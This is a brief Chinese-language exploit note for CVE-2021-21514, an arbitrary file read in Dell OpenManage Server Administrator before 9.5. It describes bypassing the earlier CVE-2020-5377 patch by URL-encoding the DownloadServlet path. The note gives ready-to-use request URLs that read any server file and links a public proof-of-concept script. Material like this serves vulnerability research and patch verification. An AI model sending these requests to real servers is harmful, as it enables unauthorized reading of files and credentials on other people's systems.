Dell OpenManage Server Administrator 任意文件读取 (CVE-2021-21514)¶
此漏洞利用已知的身份验证绕过来获取OMSA的Web管理界面有效会话cookie。攻击者可以构造请求从服务器读取任意文件。CVE-2021-21514为CVE-2020-5377的补丁绕过。
影响版本:Dell OpenManage Server Administrator < 9.5
通过URL编码绕过DownloadServlet方法:
https://omsa.server/{VID}/DownloadServle%74?help=Certificate&app=oma&vid={VID}&file=C:\some\file
https://omsa.server/{VID}/DownloadServlet?help=Certificate&app=oma&vid={VID}&file=C:\some\file
%74为t编码后的URL。
使用:
CVE-2020-5377.py
poc.py:https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2020-5377_CVE-2021-21514